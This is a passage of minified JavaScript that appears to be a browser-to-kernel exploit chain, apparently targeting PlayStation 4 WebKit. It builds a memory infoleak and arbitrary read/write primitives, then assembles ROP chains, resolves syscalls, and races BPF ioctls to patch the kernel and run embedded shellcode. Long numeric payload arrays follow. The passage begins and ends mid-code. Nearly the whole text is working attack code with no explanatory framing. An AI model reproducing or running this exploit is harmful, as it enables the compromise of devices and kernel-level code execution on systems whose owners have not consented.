maxCount=256;while(foundLeak==undefined&&maxCount>0){maxCount--;history.pushState(y,"");Object.defineProperties({},props);var leak=new Uint32Array(history.state.data.buffer);for(var i=0;i<leak.length-6;i++){if(leak[i]==1111638594&&leak[i+1]==4294901760&&leak[i+2]==0&&leak[i+3]==0&&leak[i+4]==0&&leak[i+5]==0&&leak[i+6]==14&&leak[i+7]==0&&leak[i+10]==0&&leak[i+11]==0&&leak[i+12]==0&&leak[i+13]==0&&leak[i+14]==14&&leak[i+15]==0){foundIndex=i;foundLeak=leak;break;};};};if(!foundLeak){throw new Error("infoleak fail");};Array.prototype.__defineGetter__(100,()=>1);var firstLeak=Array.prototype.slice.call(foundLeak,foundIndex,foundIndex+64);var leakJSVal=new int64(firstLeak[8],firstLeak[9]);var f=document.body.appendChild(document.createElement("iframe"));var a=new f.contentWindow.Array(13.37,13.37);var b=new f.contentWindow.Array(u2d(leakJSVal.low+16,leakJSVal.hi),13.37);var master=new Uint32Array(4096);var slave=new Uint32Array(4096);var leakval_u32=new Uint32Array(4096);var leakval_helper=[slave,2,3,4,5,6,7,8,9,10];tgt.a=u2d(2048,23077632);tgt.b=0;tgt.c=leakval_helper;tgt.d=4919;var c=Array.prototype.concat.call(a,b);document.body.removeChild(f);var hax=c[0];c[0]=0;tgt.c=c;hax[2]=0;hax[3]=0;Object.defineProperty(Array.prototype,100,{get:undefined});tgt.c=leakval_helper;var butterfly=new int64(hax[2],hax[3]);butterfly.low+=16;tgt.c=leakval_u32;var lkv_u32_old=new int64(hax[4],hax[5]);hax[4]=butterfly.low;hax[5]=butterfly.hi;tgt.c=master;hax[4]=leakval_u32[0];hax[5]=leakval_u32[1];var a2sb=new int64(master[4],master[5]);tgt.c=leakval_u32;hax[4]=lkv_u32_old.low;hax[5]=lkv_u32_old.hi;tgt.c=0;hax=0;var p={write8:function(addr,val){master[4]=addr.low;master[5]=addr.hi;if(val instanceof int64){slave[0]=val.low;slave[1]=val.hi;}else{slave[0]=val;slave[1]=0;};master[4]=a2sb.low;master[5]=a2sb.hi;},write4:function(addr,val){master[4]=addr.low;master[5]=addr.hi;slave[0]=val;master[4]=a2sb.low;master[5]=a2sb.hi;},read8:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=new int64(slave[0],slave[1]);master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},read4:function(addr){master[4]=addr.low;master[5]=addr.hi;var rtv=slave[0];master[4]=a2sb.low;master[5]=a2sb.hi;return rtv;},leakval:function(jsval){leakval_helper[0]=jsval;var rtv=this.read8(butterfly);this.write8(butterfly,new int64(1094795585,4294901760));return rtv;}};var get_jmptgt=function(addr){var z=p.read4(addr)&65535;var y=p.read4(addr.add32(2));if(z!=9727)return 0;return addr.add32(y+6);};var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func);return(p.read8(fptr_store.add32(24))).add32(64);};var parseFloatStore=p.leakfunc(parseFloat);var webKitBase=p.read8(parseFloatStore);webKitBase.low&=4294963200;webKitBase.sub32inplace(5881856-147456);var o2wk=function(o){return webKitBase.add32(o);};for(var gn in gc){if(gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};};var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail));libKernelBase.low&=4294963200;libKernelBase.sub32inplace(53248+16384);var wkview=new Uint8Array(4096);var wkstr=p.leakval(wkview).add32(16);p.write8(wkstr,webKitBase);p.write4(wkstr.add32(8),57131008);var hold1;var hold2;var holdz;var holdz1;while(1){hold1={a:0,b:0,c:0,d:0};hold2={a:0,b:0,c:0,d:0};holdz1=p.leakval(hold2);holdz=p.leakval(hold1);if(holdz.low-48==holdz1.low)break;};var pushframe=[];pushframe.length=128;var funcbuf;var funcbuf32=new Uint32Array(256);nogc.push(funcbuf32);var launch_chain=function(chain){var stackPointer=0;var stackCookie=0;var orig_reenter_rip=0;var reenter_help={length:{valueOf:function(){orig_reenter_rip=p.read8(stackPointer);stackCookie=p.read8(stackPointer.add32(8));var returnToFrame=stackPointer;var ocnt=chain.count;chain.push_write8(stackPointer,orig_reenter_rip);chain.push_write8(stackPointer.add32(8),stackCookie);if(chain.runtime)returnToFrame=chain.runtime(stackPointer);chain.push(g.pop_rsp);chain.push(returnToFrame);chain.count=ocnt;p.write8(stackPointer,(g.pop_rsp));p.write8(stackPointer.add32(8),chain.stackBase);}}};funcbuf=p.read8(p.leakval(funcbuf32).add32(16));p.write8(funcbuf.add32(48),g.setjmp);p.write8(funcbuf.add32(128),g.jop);p.write8(funcbuf,funcbuf);p.write8(parseFloatStore,g.jop);var orig_hold=p.read8(holdz1);var orig_hold48=p.read8(holdz1.add32(72));p.write8(holdz1,funcbuf.add32(80));p.write8(holdz1.add32(72),funcbuf);parseFloat(hold2,hold2,hold2,hold2,hold2,hold2);p.write8(holdz1,orig_hold);p.write8(holdz1.add32(72),orig_hold48);stackPointer=p.read8(funcbuf.add32(16));rtv=Array.prototype.splice.apply(reenter_help);return p.leakval(rtv);};p.loadchain=launch_chain;var kview=new Uint8Array(4096);var kstr=p.leakval(kview).add32(16);p.write8(kstr,libKernelBase);p.write4(kstr.add32(8),262144);var countbytes;for(var i=0;i<262144;i++){if(kview[i]==114&&kview[i+1]==100&&kview[i+2]==108&&kview[i+3]==111&&kview[i+4]==99){countbytes=i;break;};};p.write4(kstr.add32(8),countbytes+32);var dview32=new Uint32Array(1);var dview8=new Uint8Array(dview32.buffer);for(var i=0;i<countbytes;i++){if(kview[i]==72&&kview[i+1]==199&&kview[i+2]==192&&kview[i+7]==73&&kview[i+8]==137&&kview[i+9]==202&&kview[i+10]==15&&kview[i+11]==5){dview8[0]=kview[i+3];dview8[1]=kview[i+4];dview8[2]=kview[i+5];dview8[3]=kview[i+6];var syscallno=dview32[0];s[syscallno]=libKernelBase.add32(i);};};var chain=new rop();var returnvalue;p.fcall_=function(rip,rdi,rsi,rdx,rcx,r8,r9){chain.clear();chain.notimes=this.next_notime;this.next_notime=1;chain.fcall(rip,rdi,rsi,rdx,rcx,r8,r9);chain.push(g.pop_rdi);chain.push(chain.stackBase.add32(16376));chain.push(g.mov__rdi__rax);chain.push(g.pop_rax);chain.push(p.leakval(1094795842));if(chain.run().low!=1094795842){throw new Error("unexpected rop behaviour");};returnvalue=p.read8(chain.stackBase.add32(16376));};p.fcall=function(){p.fcall_.apply(this,arguments);return returnvalue;};p.readstr=function(addr){var addr_=addr.add32(0);var rd=p.read4(addr_);var buf="";while(rd&255){buf+=String.fromCharCode(rd&255);addr_.add32inplace(1);rd=p.read4(addr_);};return buf;};p.syscall=function(sysc,rdi,rsi,rdx,rcx,r8,r9){if(typeof sysc!="number"){throw new Error("invalid syscall");};var off=s[sysc];if(off==undefined){throw new Error("invalid syscall");};return p.fcall(off,rdi,rsi,rdx,rcx,r8,r9);};p.sptr=function(str){var bufView=new Uint8Array(str.length+1);for(var i=0;i<str.length;i++){bufView[i]=str.charCodeAt(i)&255;};nogc.push(bufView);return p.read8(p.leakval(bufView).add32(16));};p.malloc=function(sz){var backing=new Uint8Array(65536+sz);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=backing;return ptr;};p.malloc32=function(sz){var backing=new Uint8Array(65536+sz*4);nogc.push(backing);var ptr=p.read8(p.leakval(backing).add32(16));ptr.backing=new Uint32Array(backing.buffer);return ptr;};var test=p.syscall(23,0);if(test!="0"){var fd=p.syscall(5,p.sptr("/dev/bpf0"),2).low;var fd1=p.syscall(5,p.sptr("/dev/bpf0"),2).low;if(fd==(-1>>>0)){throw new Error("open bpf fail");};var bpf_valid=p.malloc32(16384);var bpf_spray=p.malloc32(16384);var bpf_valid_u32=bpf_valid.backing;var bpf_valid_prog=p.malloc(64);p.write8(bpf_valid_prog,2048/8);p.write8(bpf_valid_prog.add32(8),bpf_valid);var bpf_spray_prog=p.malloc(64);p.write8(bpf_spray_prog,2048/8);p.write8(bpf_spray_prog.add32(8),bpf_spray);for(var i=0;i<1024;){bpf_valid_u32[i++]=6;bpf_valid_u32[i++]=0;};var rtv=p.syscall(54,fd,2148549243,bpf_valid_prog);if(rtv.low!=0){throw new Error("ioctl bpf fail");};var spawnthread=function(name,chain){var longjmp=webKitBase.add32(5352);var createThread=webKitBase.add32(7836560);var contextp=p.malloc32(8192);var contextz=contextp.backing;contextz[0]=1337;var thread2=new rop();thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);chain(thread2);p.write8(contextp,g.ret);p.write8(contextp.add32(16),thread2.stackBase);p.syscall(324,1);var retv=function(){p.fcall(createThread,longjmp,contextp,p.sptr(name));};nogc.push(contextp);nogc.push(thread2);return retv;};var interrupt1,loop1;var sock=p.syscall(97,2,2);var kscratch=p.malloc32(4096);var start1=spawnthread("GottaGoFast",function(thread2){interrupt1=thread2.stackBase;thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.ret);thread2.push(g.pop_rdi);thread2.push(fd);thread2.push(g.pop_rsi);thread2.push(2148549243);thread2.push(g.pop_rdx);thread2.push(bpf_valid_prog);thread2.push(g.pop_rsp);thread2.push(thread2.stackBase.add32(2048));thread2.count=256;var cntr=thread2.count;thread2.push(s[54]);thread2.push_write8(thread2.stackBase.add32(cntr*8),s[54]);thread2.push(g.pop_rdi);var wherep=thread2.pushSymbolic();thread2.push(g.pop_rsi);var whatp=thread2.pushSymbolic();thread2.push(g.mov__rdi__rsi);thread2.push(g.pop_rsp);loop1=thread2.stackBase.add32(thread2.count*8);thread2.push(1094795585);thread2.finalizeSymbolic(wherep,loop1);thread2.finalizeSymbolic(whatp,loop1.sub32(8));});var krop=new rop();var race=new rop();var ctxp=p.malloc32(8192);var ctxp1=p.malloc32(8192);var ctxp2=p.malloc32(8192);p.write8(bpf_spray.add32(16),ctxp);p.write8(ctxp.add32(80),0);p.write8(ctxp.add32(104),ctxp1);var stackshift_from_retaddr=0;p.write8(ctxp1.add32(16),o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(ctxp.add32(0),ctxp2);p.write8(ctxp.add32(16),ctxp2.add32(8));p.write8(ctxp2.add32(2000),o2wk(7271653));var iterbase=ctxp2;for(var i=0;i<15;i++){p.write8(iterbase,o2wk(19536333));stackshift_from_retaddr+=8+88;p.write8(iterbase.add32(2000+32),o2wk(7271653));p.write8(iterbase.add32(8),iterbase.add32(32));p.write8(iterbase.add32(24),iterbase.add32(32+8));iterbase=iterbase.add32(32);};var raxbase=iterbase;var rdibase=iterbase.add32(8);var memcpy=get_jmptgt(webKitBase.add32(248));memcpy=p.read8(memcpy);p.write8(raxbase,o2wk(22848539));stackshift_from_retaddr+=8;p.write8(rdibase.add32(112),o2wk(19417140));stackshift_from_retaddr+=8;p.write8(rdibase.add32(24),rdibase);p.write8(rdibase.add32(8),krop.stackBase);p.write8(raxbase.add32(48),g.mov_rbp_rsp);p.write8(rdibase,raxbase);p.write8(raxbase.add32(1056),o2wk(2566497));p.write8(raxbase.add32(64),memcpy.add32(194-144));var topofchain=stackshift_from_retaddr+40;p.write8(rdibase.add32(176),topofchain);for(var i=0;i<4096/8;i++){p.write8(krop.stackBase.add32(i*8),g.ret);};krop.count=16;var kpatch=function(offset,qword){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.pop_rsi);krop.push(qword);krop.push(g.mov__rax__rsi);};var kpatch2=function(offset,offset2){krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(offset2);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);};p.write8(kscratch.add32(1056),g.pop_rdi);p.write8(kscratch.add32(64),g.pop_rax);p.write8(kscratch.add32(24),kscratch);krop.push(g.pop_rdi);krop.push(kscratch.add32(24));krop.push(g.mov_rbp_rsp);var rboff=topofchain-krop.count*8+40;krop.push(o2wk(2566497));krop.push(g.pop_rax);krop.push(rboff);krop.push(g.add_rdi_rax);krop.push(g.mov_rax__rdi__);krop.push(g.pop_rsi);krop.push(762);krop.push(g.add_rax_rsi);krop.push(g.mov__rdi__rax);var shellbuf=p.malloc32(4096);krop.push(g.pop_rdi);krop.push(kscratch);krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(808116);krop.push(g.add_rax_rsi);krop.push(g.pop_rdi);krop.push(kscratch.add32(8));krop.push(g.mov__rdi__rax);krop.push(g.jmp_rax);krop.push(g.pop_rdi);krop.push(kscratch.add32(16));krop.push(g.mov__rdi__rax);krop.push(g.pop_rsi);krop.push(new int64(4294901759,4294967295));krop.push(g.and_rax_rsi);krop.push(g.mov_rdx_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.mov_rax_rdx);krop.push(g.jmp_rdi);krop.push(g.pop_rax);krop.push(kscratch);krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(221338);krop.push(g.add_rax_rsi);krop.push(g.mov_rax__rax__);krop.push(g.pop_rdi);krop.push(kscratch.add32(816));krop.push(g.mov__rdi__rax);kpatch(221338,new int64(2425420344,2425393296));kpatch(20169540,shellbuf);kpatch(new int64(4293816070,4294967295),new int64(184,3297329408));kpatch(new int64(4293470503,4294967295),new int64(0,1082624841));kpatch(new int64(4293470533,4294967295),new int64(2425388523,1922076816));kpatch(new int64(4294769332,4294967295),new int64(934690871,826654769));kpatch(828366,new int64(115177,2336788480));kpatch(1329844,new int64(2428747825,2425393296));kpatch(new int64(15789236,0),new int64(2,0));kpatch2(new int64(15789244,0),new int64(4293548276,4294967295));kpatch(new int64(15789276,0),new int64(0,1));krop.push(g.pop_rax);krop.push(kscratch.add32(8));krop.push(g.mov_rax__rax__);krop.push(g.pop_rsi);krop.push(9);krop.push(g.add_rax_rsi);krop.push(g.mov_rdi_rax);krop.push(g.pop_rax);krop.push(kscratch.add32(16));krop.push(g.mov_rax__rax__);krop.push(g.jmp_rdi);krop.push(o2wk(380345));krop.push(kscratch.add32(4096));var kq=p.malloc32(16);var kev=p.malloc32(256);kev.backing[0]=sock;kev.backing[2]=131071;kev.backing[3]=1;kev.backing[4]=5;var shcode=[35817,2425393152,2425393296,2425393296,8567125,2303246336,1096172005,1398030677,2303275535,3149957588,256,551862601,1220806985,9831821,2370371584,4265616532,2370699263,3767542964,2370633744,1585456300,2169045059,1265721540,277432321,4202255,698,3867757568,524479,3607052544,960335176,1207959552,3224487561,2211839809,3698655723,1103114587,1096630620,2428722526,1032669269,4294967160,2303260209,15293925,1207959552,770247,2303262720,3271888842,1818324331,979595116,628633632,1815490864,2648,0,0,0,0,0,0,0,0,0,0,0,0,0,0];for(var i=0;i<shcode.length;i++){shellbuf.backing[i]=shcode[i];};start1();while(1){race.count=0;race.push(s[362]);race.push(g.pop_rdi);race.push(kq);race.push(g.mov__rdi__rax);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push(g.ret);race.push_write8(loop1,interrupt1);race.push(g.pop_rdi);race.push(fd);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_valid_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(g.pop_rsi);race.push(kev);race.push(g.pop_rdx);race.push(1);race.push(g.pop_rcx);race.push(0);race.push(g.pop_r8);race.push(0);race.push(s[363]);race.push(g.pop_rdi);race.push(fd1);race.push(g.pop_rsi);race.push(2148549243);race.push(g.pop_rdx);race.push(bpf_spray_prog);race.push(s[54]);race.push(g.pop_rax);race.push(kq);race.push(g.mov_rax__rax__);race.push(g.mov_rdi_rax);race.push(s[6]);race.run();if(kscratch.backing[0]!=0){p.syscall(74,shellbuf,16384,7);p.fcall(shellbuf);break;};};};var createThread=webKitBase.add32(7836560);var payloadbuf=p.malloc32(16384);var payload=[139241,3224455168,264931657,3271651845,1211990856,31,4283439220,2047765,143218944,4290824008,1224736767,4294951623,1405353983,1224378696,33614977,2370306048,1957685,3884533760,369082417,7976,3219556680,129,519706111,2168979456,131268,1103321856,1096171863,1431585109,3968026707,8567064,839892992,1221691720,1208505995,1210114497,2370357257,749973656,847989762,610044232,1653296136,4135931144,23888911,2202599424,2249132028,354,1084788040,1291845630,785430669,2370306094,3052236952,1488472064,1280262468,1229996377,2232354361,314,138906440,1213238088,1077971784,411601736,3338665985,1088,1086783488,8,339789568,0,455,2336751616,159817869,1216956417,2240497712,36444784,541231432,407013704,814189384,1207959553,5055,16777216,1086801976,4294967136,2022263039,1086802008,4294967144,537870847,3901312197,4294911304,571473918,3921168576,449,3347794064,1334855813,0,1552271104,20385,822083584,8767478,822110759,1217446848,2244468617,6599344,2428699056,4194490,3498428160,2952815794,1217446657,2134541705,2244411427,21652464,117571584,498996735,2303459328,4136193250,4292839752,1937173,3565536768,3942657584,596938058,16383,1222543688,136608907,14844232,1224736704,3221284481,129630207,1090519040,2244401151,3027156,571425141,1577273797,3296937992,1220555032,1566300809,1564564545,1598119489,2202591999,3364034756,1096637439,1096630620,3277799774,3968026707,15067152,1592262656,1207959553,31851917,2303197184,93004804,7132,608471368,4290785544,1904405,3867756544,205360456,3355443198,0,7333888,3229941760,175424393,369082417,7404,2370312331,1814845,4712448,2370306048,1817405,3926016,4290641920,1207959553,462699917,1122500608,3187671040,511,2570947912,3892314139,49,80104,1032669184,7079,4294800104,3296938239,1540917520,3234285763,10,4294783977,3234285823,11,4294780905,3234285823,136,4294777833,3234285823,591,4294774761,4052306175,1221734736,826670729,38977472,3224436736,4294767848,1405311743,1631423816,1207959579,1209068675,473302471,0,2370306048,1208755292,3270041225,2248146943,1210217664,2370363017,1787453,4289718272,3230007295,2303201140,1032669406,6982,4294941928,612142079,361580556,7160,1110805832,3892314139,4294967161,203717771,3910503752,1207959579,456340877,1659371520,1224736767,1527825539,826627011,3224454601,3526478129,2370369073,1781053,3172335360,1207959579,465442189,2370306048,1782069,2311293184,4281067719,3750363135,2232782152,1207959579,455030157,384303104,2315255807,2370329567,1808149,898451456,6928,4294901993,1355362815,4130460209,87919944,1157627931,826657073,1628831680,1493172251,1226149192,1207959579,454047117,3347644416,4294889705,255,1329677400,1346459980,3816,0,1946697603,1025900294,2332033050,3246987335,1964566977,2177010160,201326818,16417024,1962937344,947880416,4919,4280670069,2315254783,3224442951,1220643144,354227597,4148690944,286558937,940004488,1220607816,1964046467,1101982691,1096171863,1431585109,3968026707,4253632808,1106676041,2303317897,2336777676,9516,2370306048,3121357916,20,836733256,2031484918,1140850714,203717769,75205960,3136719180,16,443160063,2336751616,1700661,4018751488,369087025,6760,1223264588,2303516297,548946407,3120562176,20,428742143,2336751616,1689397,4018751488,439752191,2202533888,1566255300,1564564545,1598119489,1096237507,1096106326,1213420884,29420673,2303262720,612666365,536,611617096,3029025800,135204,3548989440,2337685840,35136644,4283432960,35136692,3036610560,137252,1955284992,369045540,6400,818185032,2302787717,3934523332,1157627906,2232415877,737,611093832,1224093984,280686473,1275068416,807695501,612142412,2434137936,1207959577,539253897,3343447601,2630724,1275068417,280688521,4278190080,1667861,1150110720,2303488036,1211114620,941900999,32,18618,1291202816,2303510409,4278723652,1657621,93145088,5548,612665672,144,486903112,1207959573,2552530057,1207959552,344851853,2303197184,10495108,2370306048,1310469,2223589376,43044,93145088,4976,612665672,176,478890085,37,898320384,6280,2303250993,4246077407,1275068440,136594571,1224182092,2303520393,823525314,1207959576,409089419,2303197184,3330884063,416159231,2235891712,3867480054,1207959553,409877899,2370568192,12068020,3375431680,4130460209,416945663,4130406400,31930,4152970240,611093832,2232811328,1207959576,4028925067,1291845633,1275352717,29020553,1275068416,2303524745,1209017428,225285,2227660288,47140,1209218816,2303248009,1711809604,3122955463,536870912,4254197760,2336817151,1561397,1221734656,369090441,6216,280688177,1207959552,369094537,6176,609520460,2144784,2303262720,2159559145,1207959552,307105165,2303459328,3616099542,390731263,2336751616,1542965,3750316032,270812297,402003455,1418395648,3531935780,15500559,2370306048,20194436,4130406400,31930,3347662848,608471368,3172335376,1207959575,270812299,698,1955284992,2303461412,2227660543,78884,1712535296,908362951,536870913,1351437312,3515436036,609519948,4241877016,2336817151,1513269,1221734656,369090441,6028,2303260209,1096431,369033216,5988,609520460,3918088472,8435777,2370306048,1152781,2144768,2303459328,3616099542,378410495,2336751616,1494837,3750316032,369083785,5948,980807045,1290701132,369096585,5700,108314757,8227649,2336758251,2336760884,4279247996,1452821,1958774016,76236832,2201520932,108331007,370021887,2336751616,1484605,420871936,3942645783,1032538128,5784,4293144901,1509141,3296806912,440,1541441860,1096565085,1096696157,3224486751,1962902856,93014037,5748,1207995208,108314757,544750408,1103360629,4283651412,1495829,3297329408,1090882376,1207959574,2236098699,2340386029,4169336901,1211593983,371332491,2336751616,3682945050,54208628,2336754038,37019,1945037568,2609596425,136,3782599659,293763,2170947700,322373755,2336753268,3068858477,175866726,1223914784,366361995,2370306048,549063795,4278190080,1451797,93014016,5560,139704079,175355663,1207979403,369047691,5428,2302984427,1096637408,1398129500,418153288,612141384,2336777480,9516,2336751616,1406773,1221734656,369094537,5612,608996172,2159558920,1207959552,270142861,2428108800,1224736768,1209039245,369098377,5368,1094028104,1207959573,3230003081,632865673,260050698,369088581,5540,415531848,1566300297,1096106435,2303219028,1213289469,822640523,4273793243,2236153855,1208251584,1209030795,369094537,5244,2302787717,2198238660,1946158205,3682945102,2204518772,1963085947,2878164034,608,3908012364,4294967106,796246149,41146,4001975296,1172277576,369091633,5420,2696645960,3120562176,864,369096241,5392,280007,1509949440,1541441860,1096565085,1398129501,1375570248,142576456,870898481,1224736766,74760325,274238280,4293888328,1307413,1975551232,75334406,1209758720,376757125,33569665,242548736,612076872,4294885864,71666175,1532674097,2193212253,264241152,3515435058,551665992,264767816,2303247904,3800123634,4294901759,2629968399,2370370143,4294936853,2290960639,4294966848,3341150849,3391684708,3311505545,2370306148,4294893589,82477567,687891669,1083214282,1207985363,4182644109,3934388223,6439018,2424949289,6438566,2752875848,2181038077,1659466474,2311727360,1659350672,361580544,4294965781,646090052,2181010773,1789725162,3358146816,2302986793,1789466240,1167100160,1459645099,3324120989,1220555203,359989125,3238366024,1207959571,2236088459,1208382656,1965062203,2236138482,1213421055,1951595401,898451495,4288,334632447,2236088320,3314108608,2370310772,1092413,3038117632,1207959571,351373,3750316120,637492571,4924,1222324563,1209068675,594870149,1963081603,1955416094,369035300,4872,259375237,608471880,1222324488,17332355,1220776975,2299577475,1103322072,1096171863,1431585109,3968026707,4270410024,612142408,3373661976,1090519058,1946238595,4152970269,4294942696,1975551487,4152970257,312874495,2302738432,11397568,2336292864,45746246,1275068416,318647691,2336751616,1244981,1049314560,136594569,1706495813,3071230220,21040709,3965929924,4293888328,1257237,213401856,1207959552,2303246469,1231582403,1211659915,2303257225,3910533087,1224736786,1211661963,2303519369,3642097646,1090519058,132807,2303459328,1720272375,622198536,1224736786,1211661963,2303257225,608471518,2971008780,2332033042,1158161476,2336767625,1211189,3750316032,138840385,313923071,2336489472,1208755268,1529398403,1572899140,1564564545,1598119489,1431585219,4253632595,2699854152,2197815296,2303263039,1208776140,1031075461,1977910605,2302077740,1208755284,3894686857,4294966940,607423304,1418444933,3681881124,1222740300,369094537,4528,79849,4018751488,4294866920,1975551487,1489674,4041801728,1207959552,270824589,4293888328,1146645,2311095552,3632598979,2332033024,4169334853,1208972545,1211651467,2215629445,175,4169362411,3162836738,1207959552,255358347,252464823,1209550519,1222660493,1208344769,2202583593,2249146362,162,252699264,39301,1418545152,2236096518,259028178,1208895159,99469,1224736767,2169030145,34878,1209431296,1208534659,405044365,35002,2232811264,3942645777,272796461,4261428582,2370322549,3122144380,136,154504520,4278190095,1139477,1149978624,2336755748,1149847552,2370312228,3122144372,136,4293364044,1131285,3138710272,3,494341611,49840998,767277172,2298478592,3140348888,4294967261,3686528491,3959422975,272459502,1721464062,1979586621,2089634013,2293897252,1207959552,234763661,2481651712,2697232712,1526726656,3277603165,3850979413,3968026707,1166755864,4220078080,4168649544,1962902856,1435060249,1971931360,4246137064,2336817151,3230001269,3763702600,2202537845,2303203524,4284308447,1060645,71485184,0,415531848,1566294065,2303219139,1096237541,1096106326,2202555220,2336762092,2303262789,1720405247,4085860360,1483639628,1148619588,4168649544,1346800456,1224705352,2345158025,1166624838,3296989124,2197815296,2303197503,309639253,4294745064,1975551487,1435191305,11135416,2303459328,3828434407,4294715624,3229960447,2337014900,2336755808,384354429,838860796,3229960438,2336752756,826609776,3984936447,2303463796,4227590383,2236153855,1275360448,1292925067,2104812677,1962313032,3984936312,3977087816,251658255,961331861,2500839533,1153598656,913633417,1962313029,12402993,1207959616,692438529,3884535029,1290701125,3523211913,1962902861,3293940540,641502539,1157531980,369093161,4008,1435183083,3321972932,4293364044,1209723857,1210631299,2303516297,1547787263,1581342017,4284309313,982821,71550720,0,683967304,1103114587,1096630620,1566523742,8567235,839892992,551731528,265292104,2303247904,3800123634,4294901759,2629968399,2370370143,4294754317,2425178367,4294966848,3819366785,3509125219,3789719689,2370306147,4294682125,2173519103,4288419071,4145932673,3509125219,2312120641,1677023624,227362816,4294966804,831580545,2302935140,1676230016,2312186112,1680854152,227362816,4294966857,1034414465,3509125220,1004767369,2370306148,4294631693,1659470335,687891426,2659748305,1459643360,3324120989,8567235,839892992,1221691720,1210114497,2370357257,1262440592,361318401,3704,2291174728,1208044699,241309065,2370306048,942553232,361318402,3660,1217432904,1208119776,238425481,2370306048,1910773904,361318402,3616,2291174728,1208120387,235541897,2370306048,1950587024,361318402,3572,1083215176,1208120446,232658313,2370306048,1954955408,361318402,3528,2156957000,1208120510,229774729,2370306048,84476048,361318400,3668,1351650632,1207963484,238949769,2370306048,257822864,361318400,3624,2425392456,1207963872,236066185,2370306048,283287696,361318400,3580,4036005192,1207965661,233182601,2370306048,469618832,361318400,3536,3499134280,1207966718,230299017,2370306048,514027664,361318400,3492,9473352,1207972356,227415433,2370306048,997187728,361318400,3448,2156957000,1207976798,224531849,2370306048,516046992,361318400,3404,546344264,1207959830,216405385,2370306048,1663271056,361318400,3280,814779720,1207985091,213521801,2370306048,1674281104,361318400,3236,546344264,1207985175,210638217,2370306048,1680441488,361318400,3192,3767569736,1207984621,205133193,2370306048,1658409104,361318400,3092,3230698824,1207984853,202249609,2370306048,1648230544,361318400,3080,3767569736,1207984864,199366025,2370306048,1641427088,361318400,3068,277908808,1207967702,202249609,2370306048,975835280,361318400,3056,1083215176,1207974444,198841737,2370306048,760475792,361318400,3036,2425392456,1207972047,190715273,2370306048,435015824,361318400,2936,9473352,1207966188,190977417,2370306048,435126416,361318400,2892,3499134280,1207966191,435527685,361318400,2864,554010952,3271557131,3904909648,4294966641,4294755560,4151109887,233373695,1509949446,246505,4286924800,2336770420,775941,1431585024,4253632595,1276676936,205399435,2303197184,3843424239,1207959563,72137613,2303197184,3263777006,2245328705,1208775872,2236095371,836007387,1208216512,1566300297,834886721,1463927744,1430345281,1398101057,955024200,1224116553,673465543,0,4292184393,700181,3481485568,3229960447,19170319,2827681792,256,1220774216,3984967561,369036917,2692,3925815621,262,174986751,4130406400,609520968,3750316072,172889599,3229941760,1976011073,3311618098,2336812937,731957,115851520,608471368,178696,369033216,2920,1237353800,192201865,1170311496,2330577201,1207959552,2202132361,369098703,2576,4292839752,661269,10283264,2336751616,1143481460,472140937,1221560648,270814345,541494088,2378596680,1207959552,1210073481,1218135691,1210597769,1220757131,2335195529,3263811398,149602662,549113889,1711276032,4281876873,706325,1149978624,2336761892,1141908556,472140939,138447688,1086423880,1220576584,673465481,4282452084,3912843713,2303233148,2232811487,1207959561,369090441,2444,1962313037,646532355,1961723213,1149978633,2303264804,2202533957,2302949572,1096637432,1096630620,3277799774,1447122753,1413567809,2202555221,1281710316,2440331,1090519040,1224722819,2215640965,173,1976730952,3375449368,264275277,40068,13060352,0,37097,3431549184,1288931656,270824589,1220905293,2303260041,822617212,1096438,2303459328,4111859703,1275068425,270820489,610569548,1552500768,4130412580,12474,3884534784,165025279,2303459328,1210066036,136608907,673465543,1,611092808,3867757616,610044232,608487224,320,608487168,324,2089372672,369051684,2180,1106085197,158646665,610020168,1569278264,3296937984,3364439128,1547787611,1581342017,1103322945,1096106326,1213420884,127548813,2202533888,3343401196,2630724,1207959552,807683271,0,941900999,114064,1009009863,114832,438584518,608487096,1153827099,3321895972,1909828,505693382,608486912,250135327,1224736765,141934725,3925854339,151,609520968,1955416112,2303207460,3297331655,4294786536,2246914559,1216116160,807693371,2303252083,1227499,3242721280,2370307811,465461,3750316032,612107080,420871976,2231369737,1210283456,673471491,947618662,1276605701,1293972363,2624910981,2370362161,1277174892,438594701,4282911723,1219292101,1946745731,477399842,3901311288,3135867212,6,1223133516,1275380611,636024321,2248146942,1222145216,673479819,1962902856,898320405,2124,203703433,143267327,1149960192,2202536996,1566261444,1564564545,1103322689,1096106326,1213420884,118109581,2202533888,146362604,1207959552,807697549,608487240,32,1153910784,10276,1153826816,3325104932,3222545476,354698438,608487167,1153875990,4086306596,1032669349,1614,4294699240,3229960447,3364030581,22276607,2370306048,1210590292,539260045,1221036360,401130889,2248146940,914689984,1207959553,673477771,611618124,1418414128,3224444964,1961900360,3515435205,1220607816,1715520131,87587203,2336811637,2236096601,1168864475,2370628913,1125655652,1294873739,2370363529,386573,375296,2303197184,3313715695,3724625924,4294777832,264275455,54405,4253239552,1221621024,321145997,1404276040,1291858330,96133257,1207959552,4058574729,2248146940,2860847040,1207959552,1